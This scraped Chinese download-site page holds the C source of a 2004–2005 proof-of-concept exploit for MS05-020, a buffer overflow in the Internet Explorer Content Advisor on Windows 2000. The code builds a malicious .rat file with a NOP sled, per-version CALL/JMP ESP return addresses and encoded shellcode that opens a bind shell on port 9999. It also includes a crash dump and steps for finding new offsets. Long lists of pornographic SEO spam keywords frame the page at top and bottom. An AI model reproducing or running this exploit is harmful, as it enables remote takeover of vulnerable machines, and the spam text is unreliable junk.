亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? internet explorer content advisor memory corruption exploit (ms05-020).txt

?? 一些可以實現(xiàn)益出的程序
?? TXT
字號:
/*
* Ms05-020 Content Advisor Memory Corruption Vulnerability POC
*
*
* Exploit by : Miguel Tarasc?Acu馻 - Haxorcitos.com 2004/2005
* Tarako AT gmail.com 
*
* Credits:
* Andres Tarasc?(atarasco _at_ sia.es) has discovered this vulnerability
*
* Platforms afected/tested:
*
* - Windows 2000 SP2 Spanish
* - Windows 2000 SP3 Spanish
* - Windows 2000 SP4 Spanish
* - Probably All Windows 2000 versions
*
*
* Original Advisory: http://www.microsoft.com/technet/security/bulletin/MS05-020.mspx
* Exploit Date: 22/11/2004
*
* Disclosure Timeline:
* November 15 2004 - Discovered
* November 22 2004 - Exploit was developed
* November 29 2004 - Initial Vendor Notification
* November 29 2004 - Initial Vendor Notification
* December 15 2004 - Coordinated disclosure
* April 12 2005 - MS05-020 Released
*
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr and #localhost @efnet
*
*
* rsaci.rat POC example file:
*
* ((PICS-version 1.0)
* (rating-system "http://www.haxorcitos.com/")
* (rating-service "http://www.haxorcitos.com/index.html")
* (name "AAAAA...300...AAAAA")
* (description "msrating.dll,ClickedOnRAT() - Asesor de Contenido Bof ")
*
* after double click, msrating.dll,ClickedOnRAT() is executed. CPU registers
*
* 0:001> g
* (330.6b0): Access violation - code c0000005 (first chance)
* First chance exceptions are reported before any exception handling.
* This exception may be expected and handled.
* eax=00000000 ebx=0006f638 ecx=00010101 edx=ffffffff esi=77e1588a edi=0006f360
* eip=41414141 esp=0006f360 ebp=41414141 iopl=0 nv up ei pl zr na po nc
* cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
* 41414141 ?? ???
*
* How to get new offsets for Windows 2000:
* 1) execute generated .rat file
* 2) search for FFD4 (CALL ESP) in the memory address (for example wininet.dll)
* 3) Place your new offset into the exploit
*
*/

#include <stdio.h>
#include <windows.h>

#pragma pack(1)

#define RATFILE "rsaci.rat"

unsigned char shellcode[] = { // spawn a Shell on port 9999
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
"\x8A\x88\xAF\x87\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
"\xD3\x4A\x8C\x88"
};


unsigned char RHeader[]="((PICS-version 1.0)\n"
"(rating-system \"http://www.haxorcitos.com\")\n"
"(rating-service \"http://www.haxorcitos.com/index.html\")\n"
"(name \"";
unsigned char RTail[]= "\")\n"
"(description \" Ms05-020 Content Advisor Memory Corruption Vulnerability\"))\n"
"(description \" http://www.microsoft.com/technet/security/bulletin/MS05-020.mspx\"))\n"
"(description \" Exploit by Miguel Tarasc?Acu馻 - Tarako [AT] gmail[dot]com\"))\n";

char jmpbelow[]= "\x90\xeb\xFF\x90";

struct { char *name; long offset; } supported[] = { 
{" Windows 2000 Pro SP2 Spanish" , 0x772153D3}, // FFD4 CALL ESP - wininet.dll 6.0.2900.2577
/*C:\>Findjmp.exe wininet.dll ESP
0x77181783 push ESP - ret
0x771A31CB push ESP - ret
0x771ABFB9 jmp ESP
0x771AF5FE jmp ESP
0x771B2FAD jmp ESP
0x771B470E jmp ESP
0x771C8382 jmp ESP
0x771CC694 jmp ESP
0x771CE3C7 jmp ESP
0x771CFA0B jmp ESP
0x771F5D7B jmp ESP
0x771FE9D9 jmp ESP
0x77212C74 jmp ESP
0x7721448D jmp ESP
0x772153D3 call ESP
0x772155AB jmp ESP
0x77215723 jmp ESP
0x77215788 jmp ESP
0x77216161 jmp ESP
0x77216221 jmp ESP
0x772170AF jmp ESP
0x7721745F jmp ESP
0x772174DB call ESP
0x77217717 call ESP
0x77217F70 call ESP
0x77218137 call ESP
0x7721813F jmp ESP
*/
{" Windows 2000 Pro SP3 Spanish" , 0x76BE5983}, // FFD4 CALL ESP - wininet.dll 5.0.3502.4619 
/*C:\>Findjmp.exe wininet.dll ESP
0x76BE5983 call ESP
0x76BE8AAC push ESP - ret*/
{" Windows 2000 Pro SP4 Spanish" , 0x702853D3}, // FFD4 CALL ESP - wininet.dll 6.0.2800.1106
/*C:\>Findjmp.exe wininet.dll ESP
0x70219C3A push ESP - ret
0x70282C74 jmp ESP
0x70282D3D jmp ESP
0x70283B1C jmp ESP
0x70283BE5 jmp ESP
0x702843C4 jmp ESP
0x7028448D jmp ESP
0x702853D3 call ESP
0x702855AB jmp ESP
0x70285723 jmp ESP
0x70285788 jmp ESP
0x70286161 jmp ESP
0x70286221 jmp ESP
0x702870AF jmp ESP
0x7028745F jmp ESP
0x702874DB call ESP
0x70287717 call ESP
0x70287F70 call ESP
0x70288137 call ESP
0x7028813F jmp ESP*/
{" Windows 2000 Server SP4 Spanish" , 0x76BFBB5B}, // FFE4 JMP ESP - wininet.dll 5.0.3700.6713
/*C:\>Findjmp.exe wininet.dll ESP
0x76BE558B push ESP - ret
0x76BFBB5B jmp ESP
0x76BFC155 push ESP - ret
0x76BFC159 push ESP - ret */
{" Crash", 0x41414141}

},VERSIONES;

/******************************************************************************/
void ShowHeader(int argc) {
int i;
printf(" Ms05-020 Content Advisor Memory Corruption Vulnerability\n");
printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n\n");

printf(" Windows Versions:\n");
printf(" ----------------------------------------\n");
for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
printf(" %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset);
}
printf(" ----------------------------------------\n\n");
if (argc<2) { 
printf(" Usage: ratBof.exe <Windows Version>\n");
exit(1);
}
}
/******************************************************************************/


int main(int argc, char* argv[]) {
char buf[1500];
FILE *ratFile=fopen(RATFILE,"w");;
int i;

ShowHeader(argc); 

i=atoi(argv[1]);
printf(" [i] Creating exploit File for platform: %s\n",supported[i].name);

fwrite(RHeader, sizeof(RHeader)-1, 1,ratFile);

memset(buf,0x90,sizeof(buf));
memcpy(buf+280,jmpbelow,strlen(jmpbelow)); // salto 


memcpy(buf+284,&supported[i].offset,sizeof(long)); // offset
memcpy(buf+500,shellcode,sizeof(shellcode)-1);

fwrite(buf,sizeof(buf),1,ratFile);
fwrite(RTail, sizeof(RTail), 1,ratFile);

printf(" [i] rsaci.rat created\n\n");

fclose(ratFile);
return 0;
}
/******************************************************************************/

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美婷婷六月丁香综合色| 亚洲免费在线观看| 日本道在线观看一区二区| 美女爽到高潮91| 一区二区三区四区在线免费观看 | 中文字幕一区二区不卡| 7777精品伊人久久久大香线蕉超级流畅 | 亚洲午夜久久久久中文字幕久| 久久久高清一区二区三区| 3d动漫精品啪啪一区二区竹菊| 91小视频免费观看| 97久久精品人人做人人爽50路| 国产精品亚洲一区二区三区在线 | 91麻豆精品国产91久久久久| 一本一道久久a久久精品| 成人97人人超碰人人99| 成人免费视频caoporn| 国产69精品久久久久毛片| 国产麻豆精品在线| 国产成人午夜电影网| 国产精品1区二区.| 成人动漫一区二区三区| 波多野结衣中文字幕一区| www.亚洲激情.com| 色综合久久中文综合久久97| 色婷婷av一区| 欧美日韩日日摸| 91精品国产欧美一区二区18| 日韩欧美国产三级| 亚洲精品一区在线观看| 国产午夜精品一区二区| 国产精品久久一卡二卡| 亚洲女同女同女同女同女同69| 亚洲激情成人在线| 五月天激情综合网| 国内精品久久久久影院薰衣草| 国产成人h网站| 一本大道综合伊人精品热热| 欧美日韩亚洲国产综合| 精品国产免费一区二区三区四区| 久久久久国产精品厨房| 亚洲日本丝袜连裤袜办公室| 午夜电影网一区| 九九国产精品视频| 成人a级免费电影| 欧美视频在线不卡| 精品美女一区二区| 中文字幕欧美一| 日韩高清在线观看| 成人小视频免费在线观看| 色婷婷香蕉在线一区二区| 日韩欧美一级特黄在线播放| 国产精品久久久久久亚洲伦 | 国产日本一区二区| 一区二区视频在线| 秋霞成人午夜伦在线观看| 不卡av电影在线播放| 91精品综合久久久久久| 中文字幕国产一区二区| 三级不卡在线观看| 波多野结衣欧美| 欧美一区二区久久| 亚洲欧美日韩国产一区二区三区 | 国产老肥熟一区二区三区| 在线观看欧美黄色| 欧美激情中文字幕一区二区| 首页综合国产亚洲丝袜| 99久久精品情趣| 精品久久久久久无| 亚洲欧美乱综合| 国产宾馆实践打屁股91| 3d动漫精品啪啪| 一区二区三区产品免费精品久久75| 国产精品综合一区二区| 欧美一区国产二区| 亚洲国产乱码最新视频| 99视频在线观看一区三区| 国产亚洲欧美激情| 国产一区二区三区不卡在线观看| 91麻豆精品国产无毒不卡在线观看| 亚洲日本在线a| 99v久久综合狠狠综合久久| 2022国产精品视频| 日本伊人色综合网| 欧美日本一道本| 亚洲制服丝袜一区| 91美女福利视频| 中文字幕一区二区三区蜜月| 粉嫩一区二区三区性色av| 日韩精品一区二区在线观看| 丝袜a∨在线一区二区三区不卡| 色www精品视频在线观看| 亚洲婷婷综合久久一本伊一区| 国产成a人亚洲精| 久久久久久99久久久精品网站| 卡一卡二国产精品| 日韩欧美在线影院| 麻豆精品视频在线| 欧美一卡二卡在线观看| 日本成人在线视频网站| 欧美精品三级日韩久久| 天天亚洲美女在线视频| 在线成人午夜影院| 日日摸夜夜添夜夜添国产精品 | 日本一区二区三区高清不卡| 极品瑜伽女神91| 精品国产91乱码一区二区三区| 久久疯狂做爰流白浆xx| 欧美tickling挠脚心丨vk| 毛片一区二区三区| 精品剧情在线观看| 国产精品一区二区久激情瑜伽| 久久精品一二三| 99精品视频一区| 亚洲成人精品一区| 欧美精品日韩一本| 精品无人码麻豆乱码1区2区| 国产日韩欧美综合在线| a美女胸又www黄视频久久| 亚洲免费大片在线观看| 欧美色手机在线观看| 全部av―极品视觉盛宴亚洲| 久久久亚洲精品一区二区三区| 久久99国产精品成人| 国产精品美女一区二区三区| 在线成人免费视频| 欧美人伦禁忌dvd放荡欲情| 一区二区国产视频| 日韩一区二区三区免费观看| 欧美探花视频资源| 亚洲精品欧美在线| 国产精品一区免费视频| 亚洲午夜久久久久久久久电影网| 国产精品国产馆在线真实露脸| 欧美xxxxxxxx| 日韩区在线观看| 欧美另类z0zxhd电影| 国产成人午夜99999| 国产精品99久久不卡二区| 美女网站在线免费欧美精品| 日韩精品高清不卡| 视频一区二区三区入口| 亚洲精品五月天| 亚洲人亚洲人成电影网站色| 国产欧美精品在线观看| 久久久一区二区三区捆绑**| 亚洲人吸女人奶水| 国产精品素人视频| 国产色婷婷亚洲99精品小说| 国产亚洲精品资源在线26u| 久久久国产午夜精品 | 精品国产乱码久久久久久闺蜜| 欧美一区国产二区| 日韩美女天天操| 精品人在线二区三区| 日韩美女视频在线| 久久综合久久99| 中文字幕国产精品一区二区| 亚洲图片激情小说| 亚洲一区二区三区影院| 亚洲小少妇裸体bbw| 天堂午夜影视日韩欧美一区二区| 免费观看在线色综合| 精品一区二区三区免费| 国产成人在线视频网站| 99国内精品久久| 欧美三级在线看| 日韩欧美国产综合| 国产精品灌醉下药二区| 一区二区三区四区高清精品免费观看 | 91麻豆免费看片| 宅男噜噜噜66一区二区66| 欧美v国产在线一区二区三区| 久久久五月婷婷| 亚洲六月丁香色婷婷综合久久| 亚洲成在线观看| 蜜桃久久精品一区二区| 国产精品18久久久久久vr| 丁香天五香天堂综合| 日本韩国精品在线| 欧美一区二区视频在线观看2022| www成人在线观看| 亚洲一区二区精品久久av| 久久超级碰视频| 色国产精品一区在线观看| 欧美mv日韩mv| 一区二区三区电影在线播| 国产一区在线视频| 欧美在线一区二区三区| 精品成人一区二区三区四区| 亚洲欧美日韩综合aⅴ视频| 免费在线观看成人| 日本高清无吗v一区| 欧美变态tickling挠脚心| 亚洲丝袜制服诱惑| 精品中文字幕一区二区| 色婷婷激情综合| 国产亲近乱来精品视频| 亚洲高清不卡在线观看| 豆国产96在线|亚洲|